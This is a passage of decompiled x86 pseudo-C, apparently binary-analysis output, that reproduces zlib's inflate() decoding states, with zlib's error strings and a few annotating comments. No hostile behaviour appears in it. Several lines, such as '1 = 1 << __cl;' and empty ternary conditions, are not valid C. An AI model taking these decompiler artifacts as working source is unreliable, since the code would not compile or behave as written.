                            											__edx = __edx >> __cl;
                            											__esi = __esi - (__esi & 0x00000007);
                            											 *(__esp + 0x10) = __edx;
                            											__eflags = __esi - 0x20;
                            											if(__esi >= 0x20) {
                            												L181:
                            												__eax = __edx;
                            												__ecx = __dx & 0x0000ffff;
                            												 !__edx =  !__edx >> 0x10;
                            												__eflags = __ecx -  !__edx >> 0x10;
                            												if(__ecx ==  !__edx >> 0x10) {
                            													__edx = 0;
                            													 *(__edi + 0x44) = __ecx;
                            													__esi = 0;
                            													 *(__esp + 0x10) = 0;
                            													__eflags =  *(__esp + 0x4c) - 6;
                            													 *(__edi + 4) = 0x3f42;
                            													if( *(__esp + 0x4c) == 6) {
                            														__edi = 0;
                            														goto L116;
                            													} else {
                            														__ecx =  *(__esp + 0x48);
                            														goto L185;
                            													}
                            												} else {
                            													__ecx =  *(__esp + 0x48);
                            													 *(__ecx + 0x18) = "invalid stored block lengths";
                            													 *(__edi + 4) = 0x3f51;
                            													goto L191;
                            												}
                            											} else {
                            												while(1) {
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__edx = __edx + __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__eflags = __esi - 0x20;
                            													if(__esi < 0x20) {
                            														continue;
                            													} else {
                            														goto L181;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 0xe:
                            											L185:
                            											 *(__edi + 4) = 0x3f43;
                            											goto L186;
                            										case 0xf:
                            											L186:
                            											__eax =  *(__edi + 0x44);
                            											__eflags = __eax;
                            											if(__eax == 0) {
                            												 *(__edi + 4) = 0x3f3f;
                            												goto L191;
                            											} else {
                            												__eflags = __eax - __ebp;
                            												__eax =  >  ? __ebp : __eax;
                            												__eflags = __eax -  *(__esp + 0x1c);
                            												__eax =  >  ?  *(__esp + 0x1c) : __eax;
                            												 *(__esp + 0x34) = __eax;
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													goto L115;
                            												} else {
                            													__eax = E013189A0( *(__esp + 0x28), __ebx, __eax);
                            													__eax =  *(__esp + 0x40);
                            													 *(__esp + 0x1c) =  *(__esp + 0x1c) - __eax;
                            													__ebx = __ebx + __eax;
                            													 *(__esp + 0x20) =  *(__esp + 0x20) + __eax;
                            													__ebp = __ebp - __eax;
                            													_t358 = __edi + 0x44;
                            													 *_t358 =  *(__edi + 0x44) - __eax;
                            													__eflags =  *_t358;
                            													 *(__esp + 0x14) = __ebx;
                            													goto L189;
                            												}
                            											}
                            											goto L377;
                            										case 0x10:
                            											__eflags = __esi - 0xe;
                            											if(__esi >= 0xe) {
                            												L198:
                            												__eax = __edx;
                            												__esi = __esi - 0xe;
                            												__eax = __edx & 0x0000001f;
                            												__edx = __edx >> 5;
                            												 *(__edi + 0x64) = __eax;
                            												__eax = __edx;
                            												__eax = __edx & 0x0000001f;
                            												__edx = __edx >> 5;
                            												 *(__edi + 0x68) = __eax;
                            												__eax = __edx;
                            												__eax = __edx & 0x0000000f;
                            												__edx = __edx >> 4;
                            												__eax = __eax + 4;
                            												 *(__esp + 0x10) = __edx;
                            												__eflags =  *(__edi + 0x64) - 0x11e;
                            												 *(__edi + 0x60) = __eax;
                            												if( *(__edi + 0x64) > 0x11e) {
                            													L212:
                            													 *(__ecx + 0x18) = "too many length or distance symbols";
                            													 *(__edi + 4) = 0x3f51;
                            													goto L191;
                            												} else {
                            													__eflags =  *(__edi + 0x68) - 0x1e;
                            													if( *(__edi + 0x68) > 0x1e) {
                            														goto L212;
                            													} else {
                            														 *(__edi + 0x6c) = 0;
                            														 *(__edi + 4) = 0x3f45;
                            														goto L201;
                            													}
                            												}
                            											} else {
                            												while(1) {
                            													__eflags = __ebp;
                            													if(__ebp == 0) {
                            														goto L115;
                            													}
                            													__eax =  *__ebx & 0x000000ff;
                            													__ecx = __esi;
                            													__eax = ( *__ebx & 0x000000ff) << __cl;
                            													__ebx = __ebx + 1;
                            													__edx = __edx + __eax;
                            													 *(__esp + 0x14) = __ebx;
                            													__esi = __esi + 8;
                            													 *(__esp + 0x10) = __edx;
                            													__ebp = __ebp - 1;
                            													__eflags = __esi - 0xe;
                            													if(__esi < 0xe) {
                            														continue;
                            													} else {
                            														__ecx =  *(__esp + 0x48);
                            														goto L198;
                            													}
                            													goto L377;
                            												}
                            												goto L115;
                            											}
                            											goto L377;
                            										case 0x11:
                            											L201:
                            											__eax =  *(__edi + 0x6c);
                            											__eflags =  *(__edi + 0x6c) -  *(__edi + 0x60);
                            											if( *(__edi + 0x6c) >=  *(__edi + 0x60)) {
                            												L207:
                            												__eflags =  *(__edi + 0x6c) - 0x13;
                            												while( *(__edi + 0x6c) < 0x13) {
                            													__eax =  *(__edi + 0x6c);
                            													__ecx = 0;
                            													__eax =  *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff;
                            													 *((short*)(__edi + 0x74 + ( *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff) * 2)) = __cx;
                            													 *(__edi + 0x6c) =  *(__edi + 0x6c) + 1;
                            													__eflags =  *(__edi + 0x6c) - 0x13;
                            												}
                            												__eax = __edi + 0x534;
                            												 *(__edi + 0x58) = 7;
                            												__ecx = __edi + 0x70;
                            												 *(__edi + 0x50) = __eax;
                            												 *(__edi + 0x70) = __eax;
                            												__edx = __edi + 0x58;
                            												__edi + 0x2f4 = __edi + 0x74;
                            												__eax = E01316F90(0, __edi + 0x74, 0x13, __ecx, __edi + 0x58, __edi + 0x2f4);
                            												 *(__esp + 0x2c) = __eax;
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													 *(__edi + 0x6c) = 0;
                            													 *(__edi + 4) = 0x3f46;
                            													goto L214;
                            												} else {
                            													__ecx =  *(__esp + 0x48);
                            													__edx =  *(__esp + 0x10);
                            													 *(__ecx + 0x18) = "invalid code lengths set";
                            													 *(__edi + 4) = 0x3f51;
                            													goto L191;
                            												}
                            											} else {
                            												do {
                            													__eflags = __esi - 3;
                            													if(__esi >= 3) {
                            														goto L206;
                            													} else {
                            														while(1) {
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L115;
                            															}
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__ebx = __ebx + 1;
                            															__edx = __edx + __eax;
                            															 *(__esp + 0x14) = __ebx;
                            															__esi = __esi + 8;
                            															 *(__esp + 0x10) = __edx;
                            															__ebp = __ebp - 1;
                            															__eflags = __esi - 3;
                            															if(__esi < 3) {
                            																continue;
                            															} else {
                            																goto L206;
                            															}
                            															goto L377;
                            														}
                            														goto L115;
                            													}
                            													goto L377;
                            													L206:
                            													__eax =  *(__edi + 0x6c);
                            													__edx = __edx & 0x00000007;
                            													__edx = __edx >> 3;
                            													__esi = __esi - 3;
                            													 *(__esp + 0x10) = __edx;
                            													__eax =  *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff;
                            													 *((short*)(__edi + 0x74 + ( *(0x13322b0 +  *(__edi + 0x6c) * 2) & 0x0000ffff) * 2)) = __cx;
                            													 *(__edi + 0x6c) =  *(__edi + 0x6c) + 1;
                            													__eax =  *(__edi + 0x6c);
                            													__eflags =  *(__edi + 0x6c) -  *(__edi + 0x60);
                            												} while ( *(__edi + 0x6c) <  *(__edi + 0x60));
                            												goto L207;
                            											}
                            											goto L377;
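                            										case 0x12: /* consistent with zlib inflate() state CODELENS (mode 0x3f46): reads the literal/length and distance code lengths; the error strings in this case are zlib's */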
                            											L214:
                            											 *(__edi + 0x68) =  *(__edi + 0x68) +  *(__edi + 0x64);
                            											__eflags =  *(__edi + 0x6c) -  *(__edi + 0x68) +  *(__edi + 0x64);
                            											if( *(__edi + 0x6c) >=  *(__edi + 0x68) +  *(__edi + 0x64)) {
                            												L249:
                            												__eflags =  *(__edi + 4) - 0x3f51;
                            												if( *(__edi + 4) == 0x3f51) {
                            													L189:
                            													__edx =  *(__esp + 0x10);
                            													goto L190;
                            												} else {
                            													__eflags =  *((short*)(__edi + 0x274));
                            													if( *((short*)(__edi + 0x274)) != 0) {
                            														__eax = __edi + 0x534;
                            														 *(__edi + 0x58) = 9;
                            														__ecx = __edi + 0x70;
                            														 *(__edi + 0x50) = __eax;
                            														 *(__edi + 0x70) = __eax;
                            														__edx = __edi + 0x58;
                            														__edi + 0x2f4 = __edi + 0x74;
                            														__eax = E01316F90(1, __edi + 0x74,  *(__edi + 0x64), __ecx, __edi + 0x58, __edi + 0x2f4);
                            														 *(__esp + 0x2c) = __eax;
                            														__eflags = __eax;
                            														if(__eax == 0) {
                            															__eax =  *(__edi + 0x70);
                            															__ecx = __edi + 0x70;
                            															 *(__edi + 0x54) =  *(__edi + 0x70);
                            															__edx = __edi + 0x5c;
                            															__eax = __edi + 0x2f4;
                            															 *(__edi + 0x5c) = 6;
                            															__eax =  *(__edi + 0x64);
                            															 *(__edi + 0x64) + 0x3a = __edi + ( *(__edi + 0x64) + 0x3a) * 2;
                            															__eax = E01316F90(2, __edi + ( *(__edi + 0x64) + 0x3a) * 2,  *(__edi + 0x68), __edi + 0x70, __edx, __edi + 0x2f4);
                            															 *(__esp + 0x2c) = __eax;
                            															__eflags = __eax;
                            															if(__eax == 0) {
                            																__edx =  *(__esp + 0x4c);
                            																 *(__edi + 4) = 0x3f47;
                            																__eflags =  *(__esp + 0x4c) - 6;
                            																if( *(__esp + 0x4c) == 6) {
                            																	__edi =  *(__esp + 0x10);
                            																	goto L117;
                            																} else {
                            																	__edx =  *(__esp + 0x10);
                            																	__ecx =  *(__esp + 0x48);
                            																	goto L259;
                            																}
                            															} else {
                            																__ecx =  *(__esp + 0x48);
                            																__edx =  *(__esp + 0x10);
                            																 *(__ecx + 0x18) = "invalid distances set";
                            																 *(__edi + 4) = 0x3f51;
                            																goto L191;
                            															}
                            														} else {
                            															__ecx =  *(__esp + 0x48);
                            															__edx =  *(__esp + 0x10);
                            															 *(__ecx + 0x18) = "invalid literal/lengths set";
                            															 *(__edi + 4) = 0x3f51;
                            															goto L191;
                            														}
                            													} else {
                            														__ecx =  *(__esp + 0x48);
                            														__edx =  *(__esp + 0x10);
                            														 *(__ecx + 0x18) = "invalid code -- missing end-of-block";
                            														 *(__edi + 4) = 0x3f51;
                            														goto L191;
                            													}
                            												}
                            											} else {
                            												__edi =  *(__esp + 0x10);
                            												do {
                            													__eax =  *(__esp + 0x3c);
                            													__edx = 1;
                            													__ecx =  *( *(__esp + 0x3c));
                            													__eax =  *(__esp + 0x24);
                            													1 << __cl = (1 << __cl) - 1;
                            													__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
                            													__eax =  *( *(__esp + 0x24) + 0x50);
                            													__eax =  *( *( *(__esp + 0x24) + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
                            													__eax = __eax >> 8;
                            													__ecx = __cl & 0x000000ff;
                            													 *(__esp + 0x34) = __eax;
                            													__eflags = (__cl & 0x000000ff) - __esi;
                            													if((__cl & 0x000000ff) <= __esi) {
                            														L220:
                            														__eax = __eax >> 0x10;
                            														__eflags = __dx - 0x10;
                            														if(__eflags >= 0) {
                            															if(__eflags != 0) {
                            																__eflags =  *(__esp + 0x36) - 0x11;
                            																__edx =  *(__esp + 0x10);
                            																__ecx = __ah & 0x000000ff;
                            																if( *(__esp + 0x36) != 0x11) {
                            																	__edi = __ecx + 7;
                            																	 *(__esp + 0x34) = __ecx;
                            																	__eflags = __esi - __edi;
                            																	if(__esi >= __edi) {
                            																		L241:
                            																		__edx = __edx >> __cl;
                            																		__edx = __edx & 0x0000007f;
                            																		__eax = (__edx & 0x0000007f) + 0xb;
                            																		__edx = __edx >> 7;
                            																		__eflags = __edx;
                            																		 *(__esp + 0x30) = __eax;
                            																		__eax = 0xfffffff9;
                            																		goto L242;
                            																	} else {
                            																		while(1) {
                            																			__eflags = __ebp;
                            																			if(__ebp == 0) {
                            																				goto L115;
                            																			}
                            																			__eax =  *__ebx & 0x000000ff;
                            																			__ecx = __esi;
                            																			__eax = ( *__ebx & 0x000000ff) << __cl;
                            																			__ebx = __ebx + 1;
                            																			__edx = __edx + __eax;
                            																			 *(__esp + 0x14) = __ebx;
                            																			__esi = __esi + 8;
                            																			 *(__esp + 0x10) = __edx;
                            																			__ebp = __ebp - 1;
                            																			__eflags = __esi - __edi;
                            																			if(__esi < __edi) {
                            																				continue;
                            																			} else {
                            																				__ecx =  *(__esp + 0x34);
                            																				goto L241;
                            																			}
                            																			goto L377;
                            																		}
                            																		goto L115;
                            																	}
                            																} else {
                            																	__edi = __ecx + 3;
                            																	 *(__esp + 0x34) = __ecx;
                            																	__eflags = __esi - __edi;
                            																	if(__esi >= __edi) {
                            																		L235:
                            																		__edx = __edx >> __cl;
                            																		__edx = __edx & 0x00000007;
                            																		__eax = (__edx & 0x00000007) + 3;
                            																		__edx = __edx >> 3;
                            																		 *(__esp + 0x30) = __eax;
                            																		__eax = 0xfffffffd;
                            																		L242:
                            																		__edi =  *(__esp + 0x24);
                            																		__esi = __esi + __eax;
                            																		__eflags = __esi;
                            																		 *(__esp + 0x34) = 0;
                            																		goto L243;
                            																	} else {
                            																		while(1) {
                            																			__eflags = __ebp;
                            																			if(__ebp == 0) {
                            																				goto L115;
                            																			}
                            																			__eax =  *__ebx & 0x000000ff;
                            																			__ecx = __esi;
                            																			__eax = ( *__ebx & 0x000000ff) << __cl;
                            																			__ebx = __ebx + 1;
                            																			__edx = __edx + __eax;
                            																			 *(__esp + 0x14) = __ebx;
                            																			__esi = __esi + 8;
                            																			 *(__esp + 0x10) = __edx;
                            																			__ebp = __ebp - 1;
                            																			__eflags = __esi - __edi;
                            																			if(__esi < __edi) {
                            																				continue;
                            																			} else {
                            																				__ecx =  *(__esp + 0x34);
                            																				goto L235;
                            																			}
                            																			goto L377;
                            																		}
                            																		goto L115;
                            																	}
                            																}
                            															} else {
                            																__eax = __eax >> 8;
                            																__ecx = __cl & 0x000000ff;
                            																__ecx = (__cl & 0x000000ff) + 2;
                            																 *(__esp + 0x34) = __ecx;
                            																__eflags = __esi - __ecx;
                            																if(__esi >= __ecx) {
                            																	L227:
                            																	__edi =  *(__esp + 0x24);
                            																	__edx =  *(__esp + 0x10);
                            																	__ecx = __ah & 0x000000ff;
                            																	__edx =  *(__esp + 0x10) >> __cl;
                            																	__esi = __esi - (__ah & 0x000000ff);
                            																	__eax =  *(__edi + 0x6c);
                            																	 *(__esp + 0x10) = __edx;
                            																	__eflags = __eax;
                            																	if(__eax == 0) {
                            																		L252:
                            																		__ecx =  *(__esp + 0x48);
                            																		 *(__ecx + 0x18) = "invalid bit length repeat";
                            																		 *(__edi + 4) = 0x3f51;
                            																		goto L191;
                            																	} else {
                            																		 *(__esp + 0x34) = __eax;
                            																		__eax = __edx;
                            																		__eax = __edx & 0x00000003;
                            																		__edx = __edx >> 2;
                            																		__eax = __eax + 3;
                            																		__esi = __esi - 2;
                            																		 *(__esp + 0x30) = __eax;
                            																		L243:
                            																		__ecx =  *(__edi + 0x68);
                            																		__eax =  *(__edi + 0x6c);
                            																		__ecx =  *(__edi + 0x68) +  *(__edi + 0x64);
                            																		__eax =  *(__edi + 0x6c) +  *(__esp + 0x30);
                            																		 *(__esp + 0x10) = __edx;
                            																		__eflags =  *(__edi + 0x6c) +  *(__esp + 0x30) -  *(__edi + 0x68) +  *(__edi + 0x64);
                            																		if( *(__edi + 0x6c) +  *(__esp + 0x30) >  *(__edi + 0x68) +  *(__edi + 0x64)) {
                            																			goto L252;
                            																		} else {
                            																			__ecx =  *(__esp + 0x30);
                            																			__edx =  *(__esp + 0x34);
                            																			do {
                            																				__eax =  *(__edi + 0x6c);
                            																				 *(__edi + 0x74 +  *(__edi + 0x6c) * 2) = __dx;
                            																				 *(__edi + 0x6c) =  *(__edi + 0x6c) + 1;
                            																				__eax =  *(__edi + 0x6c);
                            																				 *(__esp + 0x34) = __eax;
                            																				__ecx = __ecx - 1;
                            																				__eflags = __ecx;
                            																			} while (__ecx != 0);
                            																			__edi =  *(__esp + 0x10);
                            																			__edx = __eax;
                            																			__ecx =  *(__esp + 0x24);
                            																			goto L247;
                            																		}
                            																	}
                            																} else {
                            																	while(1) {
                            																		__eflags = __ebp;
                            																		if(__ebp == 0) {
                            																			goto L116;
                            																		}
                            																		__edx =  *__ebx & 0x000000ff;
                            																		__ecx = __esi;
                            																		__edx = ( *__ebx & 0x000000ff) << __cl;
                            																		__ebx = __ebx + 1;
                            																		__edi = __edi + __edx;
                            																		 *(__esp + 0x14) = __ebx;
                            																		__esi = __esi + 8;
                            																		 *(__esp + 0x10) = __edi;
                            																		__ebp = __ebp - 1;
                            																		__eflags = __esi -  *(__esp + 0x34);
                            																		if(__esi <  *(__esp + 0x34)) {
                            																			continue;
                            																		} else {
                            																			goto L227;
                            																		}
                            																		goto L377;
                            																	}
                            																	goto L116;
                            																}
                            															}
                            														} else {
                            															__eax = __eax >> 8;
                            															__ecx = __al & 0x000000ff;
                            															__edi = __edi >> __cl;
                            															__esi = __esi - (__al & 0x000000ff);
                            															__ecx =  *(__esp + 0x24);
                            															 *(__esp + 0x10) = __edi;
                            															__eax =  *(__ecx + 0x6c);
                            															 *(__ecx + 0x74 +  *(__ecx + 0x6c) * 2) = __dx;
                            															 *(__ecx + 0x6c) =  *(__ecx + 0x6c) + 1;
                            															__edx =  *(__ecx + 0x6c);
                            															goto L247;
                            														}
                            													} else {
                            														while(1) {
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L116;
                            															}
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__edx = 1;
                            															__edi = __edi + (( *__ebx & 0x000000ff) << __cl);
                            															__ebx = __ebx + 1;
                            															__eax =  *(__esp + 0x3c);
                            															__esi = __esi + 8;
                            															__ebp = __ebp - 1;
                            															 *(__esp + 0x10) = __edi;
                            															 *(__esp + 0x14) = __ebx;
                            															__ecx =  *( *(__esp + 0x3c));
                            															__eax =  *(__esp + 0x24);
                            															1 << __cl = (1 << __cl) - 1;
                            															__edx = (0x00000001 << __cl) - 0x00000001 & __edi;
                            															__eax =  *( *(__esp + 0x24) + 0x50);
                            															__eax =  *( *( *(__esp + 0x24) + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edi) * 4);
                            															__eax = __eax >> 8;
                            															__ecx = __cl & 0x000000ff;
                            															 *(__esp + 0x34) = __eax;
                            															__eflags = (__cl & 0x000000ff) - __esi;
                            															if((__cl & 0x000000ff) > __esi) {
                            																continue;
                            															} else {
                            																goto L220;
                            															}
                            															goto L377;
                            														}
                            														goto L116;
                            													}
                            													goto L377;
                            													L247:
                            													 *((intOrPtr*)(__ecx + 0x68)) =  *((intOrPtr*)(__ecx + 0x68)) +  *((intOrPtr*)(__ecx + 0x64));
                            													__eflags = __edx -  *((intOrPtr*)(__ecx + 0x68)) +  *((intOrPtr*)(__ecx + 0x64));
                            												} while (__edx <  *((intOrPtr*)(__ecx + 0x68)) +  *((intOrPtr*)(__ecx + 0x64)));
                            												__edi =  *(__esp + 0x24);
                            												goto L249;
                            											}
                            											goto L377;
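                            										case 0x13: /* consistent with zlib inflate() state LEN_ (mode 0x3f47): falls through after setting mode 0x3f48 (LEN) */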
                            											L259:
                            											 *(__edi + 4) = 0x3f48;
                            											goto L260;
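                            										case 0x14: /* consistent with zlib inflate() state LEN (mode 0x3f48): decodes the next literal/length code from the table at +0x50 */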
                            											L260:
                            											__eflags = __ebp - 6;
                            											if(__ebp < 6) {
                            												L264:
                            												__eax =  *(__edi + 0x50);
                            												__ecx =  *(__edi + 0x58);
                            												 *(__esp + 0x30) =  *(__edi + 0x50);
                            												1 = 1 << __cl;
                            												__ecx =  *(__edi + 0x50);
                            												__eax = (1 << __cl) - 1;
                            												__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
                            												 *(__edi + 0x1bc8) = 0;
                            												__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 & __edx) * 4);
                            												1 = 1 >> 8;
                            												__ecx = __cl & 0x000000ff;
                            												__eflags = (__cl & 0x000000ff) - __esi;
                            												if((__cl & 0x000000ff) <= __esi) {
                            													L268:
                            													__eflags = __al;
                            													if(__al == 0) {
                            														L275:
                            														__eax = __eax >> 8;
                            														__ecx = __cl & 0x000000ff;
                            														 *(__edi + 0x1bc8) =  *(__edi + 0x1bc8) + __ecx;
                            														__esi = __esi - __ecx;
                            														__edx = __edx >> __cl;
                            														__ecx = __eax;
                            														__ecx = __eax >> 0x10;
                            														 *(__esp + 0x10) = __edx;
                            														 *(__edi + 0x44) = __ecx;
                            														__eflags = __al;
                            														if(__al != 0) {
                            															__eflags = __al & 0x00000020;
                            															if((__al & 0x00000020) == 0) {
                            																__eflags = __al & 0x00000040;
                            																if((__al & 0x00000040) == 0) {
                            																	__eax = __al & 0x000000ff;
                            																	__eax = __al & 0xf;
                            																	__eflags = __eax;
                            																	 *(__edi + 4) = 0x3f49;
                            																	 *(__edi + 0x4c) = __eax;
                            																	goto L282;
                            																} else {
                            																	__ecx =  *(__esp + 0x48);
                            																	 *(__ecx + 0x18) = "invalid literal/length code";
                            																	 *(__edi + 4) = 0x3f51;
                            																	goto L191;
                            																}
                            															} else {
                            																 *(__edi + 0x1bc8) = 0xffffffff;
                            																 *(__edi + 4) = 0x3f3f;
                            																goto L190;
                            															}
                            														} else {
                            															 *(__edi + 4) = 0x3f4d;
                            															goto L190;
                            														}
                            													} else {
                            														__eflags = __al & 0x000000f0;
                            														if((__al & 0x000000f0) != 0) {
                            															goto L275;
                            														} else {
                            															__ecx = __eax;
                            															__ebx = 1;
                            															__ecx = __eax >> 8;
                            															__edx = __eax;
                            															__edi = __cl & 0x000000ff;
                            															 *(__esp + 0x40) = __eax >> 8;
                            															__al & 0x000000ff = (__al & 0x000000ff) + __edi;
                            															__eax = __eax >> 0x10;
                            															__ebx = 1 << __cl;
                            															__ecx = __edi;
                            															__ebx = (1 << __cl) - 1;
                            															 *(__esp + 0x34) = __edx;
                            															(0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10) = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
                            															__ecx =  *(__esp + 0x30);
                            															__ebx = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax;
                            															__eax =  *( *(__esp + 0x30) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + __eax) * 4);
                            															__eax = __eax >> 8;
                            															__edi = __cl & 0x000000ff;
                            															 *(__esp + 0x40) = __cl & 0x000000ff;
                            															__edi = (__cl & 0x000000ff) + (__cl & 0x000000ff);
                            															__eflags = (__cl & 0x000000ff) + (__cl & 0x000000ff) - __esi;
                            															if((__cl & 0x000000ff) + (__cl & 0x000000ff) <= __esi) {
                            																L274:
                            																__edi =  *(__esp + 0x24);
                            																__ebx =  *(__esp + 0x14);
                            																__ecx = __dh & 0x000000ff;
                            																__edx =  *(__esp + 0x10);
                            																__edx =  *(__esp + 0x10) >> __cl;
                            																__esi = __esi - __ecx;
                            																__eflags = __esi;
                            																 *(__edi + 0x1bc8) = __ecx;
                            																goto L275;
                            															} else {
                            																while(1) {
                            																	__eflags = __ebp;
                            																	if(__ebp == 0) {
                            																		goto L115;
                            																	}
                            																	__ebx =  *(__esp + 0x14);
                            																	__ecx = __esi;
                            																	__edi = 1;
                            																	__esi = __esi + 8;
                            																	__ebp = __ebp - 1;
                            																	__eax =  *__ebx & 0x000000ff;
                            																	__ebx = __ebx + 1;
                            																	 *(__esp + 0x10) =  *(__esp + 0x10) + __eax;
                            																	__eax =  *(__esp + 0x36) & 0x0000ffff;
                            																	 *(__esp + 0x14) = __ebx;
                            																	__ebx = __dh & 0x000000ff;
                            																	__dl & 0x000000ff = (__dl & 0x000000ff) + __ebx;
                            																	__edi = 1 << __cl;
                            																	__ecx = __ebx;
                            																	(1 << __cl) - 1 = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
                            																	__edi = ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl;
                            																	__edi = (((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x36) & 0x0000ffff);
                            																	__eax =  *(__esp + 0x24);
                            																	__eax =  *( *(__esp + 0x24) + 0x50);
                            																	__eax =  *( *( *(__esp + 0x24) + 0x50) + ((((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) >> __cl) + ( *(__esp + 0x36) & 0x0000ffff)) * 4);
                            																	__eax = __eax >> 8;
                            																	__cl & 0x000000ff = (__cl & 0x000000ff) + __ebx;
                            																	__eflags = (__cl & 0x000000ff) + __ebx - __esi;
                            																	if((__cl & 0x000000ff) + __ebx > __esi) {
                            																		continue;
                            																	} else {
                            																		goto L274;
                            																	}
                            																	goto L377;
                            																}
                            																goto L115;
                            															}
                            														}
                            													}
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__ecx =  *(__edi + 0x58);
                            														__edx = __edx + __eax;
                            														__eax =  *(__edi + 0x50);
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														__edx = 1;
                            														 *(__esp + 0x14) = __ebx;
                            														1 << __cl = (1 << __cl) - 1;
                            														__edx = (0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10);
                            														__eax =  *( *(__edi + 0x50) + ((0x00000001 << __cl) - 0x00000001 &  *(__esp + 0x10)) * 4);
                            														__ecx = __eax;
                            														__edx =  *(__esp + 0x10);
                            														__eax >> 8 = __cl & 0x000000ff;
                            														__eflags = (__cl & 0x000000ff) - __esi;
                            														if((__cl & 0x000000ff) > __esi) {
                            															continue;
                            														} else {
                            															goto L268;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											} else {
                            												__eflags =  *(__esp + 0x1c) - 0x102;
                            												if( *(__esp + 0x1c) < 0x102) {
                            													goto L264;
                            												} else {
                            													__eax =  *(__esp + 0x20);
                            													_push( *(__esp + 0x28));
                            													 *(__ecx + 0xc) = __eax;
                            													__eax =  *(__esp + 0x20);
                            													 *(__ecx + 0x10) =  *(__esp + 0x20);
                            													 *__ecx = __ebx;
                            													 *(__ecx + 4) = __ebp;
                            													_push(__ecx);
                            													 *(__edi + 0x3c) = __edx;
                            													 *(__edi + 0x40) = __esi;
                            													__eax = E01317440();
                            													__ecx =  *(__esp + 0x50);
                            													__esp = __esp + 8;
                            													__eflags =  *(__edi + 4) - 0x3f3f;
                            													__edx =  *(__edi + 0x3c);
                            													__esi =  *(__edi + 0x40);
                            													__eax =  *(__ecx + 0xc);
                            													__ebx =  *__ecx;
                            													__ebp =  *(__ecx + 4);
                            													 *(__esp + 0x20) =  *(__ecx + 0xc);
                            													__eax =  *(__ecx + 0x10);
                            													 *(__esp + 0x1c) =  *(__ecx + 0x10);
                            													 *(__esp + 0x14) = __ebx;
                            													 *(__esp + 0x10) = __edx;
                            													if( *(__edi + 4) == 0x3f3f) {
                            														 *(__edi + 0x1bc8) = 0xffffffff;
                            													}
                            													goto L191;
                            												}
                            											}
                            											goto L377;
                            										case 0x15:
                            											L282:
                            											__ecx =  *(__edi + 0x4c);
                            											__eflags = __ecx;
                            											if(__ecx == 0) {
                            												L288:
                            												__eax =  *(__edi + 0x44);
                            												 *(__edi + 0x1bcc) =  *(__edi + 0x44);
                            												 *(__edi + 4) = 0x3f4a;
                            												goto L289;
                            											} else {
                            												__eflags = __esi - __ecx;
                            												if(__esi >= __ecx) {
                            													L287:
                            													__eax = 1;
                            													__esi = __esi - __ecx;
                            													1 << __cl = (1 << __cl) - 1;
                            													__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
                            													__edx = __edx >> __cl;
                            													 *(__edi + 0x44) =  *(__edi + 0x44) + __eax;
                            													_t615 = __edi + 0x1bc8;
                            													 *_t615 =  *(__edi + 0x1bc8) + __ecx;
                            													__eflags =  *_t615;
                            													 *(__esp + 0x10) = __edx;
                            													goto L288;
                            												} else {
                            													while(1) {
                            														__eflags = __ebp;
                            														if(__ebp == 0) {
                            															goto L115;
                            														}
                            														__eax =  *__ebx & 0x000000ff;
                            														__ecx = __esi;
                            														__eax = ( *__ebx & 0x000000ff) << __cl;
                            														__ebx = __ebx + 1;
                            														__ecx =  *(__edi + 0x4c);
                            														__edx = __edx + __eax;
                            														__esi = __esi + 8;
                            														 *(__esp + 0x10) = __edx;
                            														__ebp = __ebp - 1;
                            														 *(__esp + 0x14) = __ebx;
                            														__eflags = __esi - __ecx;
                            														if(__esi < __ecx) {
                            															continue;
                            														} else {
                            															goto L287;
                            														}
                            														goto L377;
                            													}
                            													goto L115;
                            												}
                            											}
                            											goto L377;
                            										case 0x16:
                            											L289:
                            											__eax =  *(__edi + 0x54);
                            											__ecx =  *(__edi + 0x5c);
                            											 *(__esp + 0x40) =  *(__edi + 0x54);
                            											1 = 1 << __cl;
                            											__ecx =  *(__edi + 0x54);
                            											__eax = (1 << __cl) - 1;
                            											__eax = (0x00000001 << __cl) - 0x00000001 & __edx;
